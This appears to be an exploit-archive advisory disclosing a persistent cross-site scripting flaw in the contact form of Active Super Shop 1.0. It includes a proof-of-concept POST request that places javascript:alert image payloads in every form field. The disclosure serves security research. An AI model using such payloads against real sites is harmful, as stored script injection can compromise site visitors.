Active Super Shop 1.0 Cross Site Scripting

2015.07.21

Credit: Angelo Ruwantha

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title:Active Super Shop Persistent XSS
# Date: Fri July 17 2015
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://activeitzone.com/
# Version:1.0
# Tested on: archlinux

Vulnerability(persistent XSS)
========================
contact form fields vulnerable to persistent xss.
[+]Method:POST

1.http://URL/index.php/home/contact/ (;persistent XSS)

name=<IMG SRC="javascript:alert('HEY;)');
&email=<IMG SRC="javascript:alert('another script;)');
&subject=<IMG SRC="javascript:alert('every parameter;)');
&message=<IMG SRC="javascript:alert('injectable;)');

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Active Super Shop 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.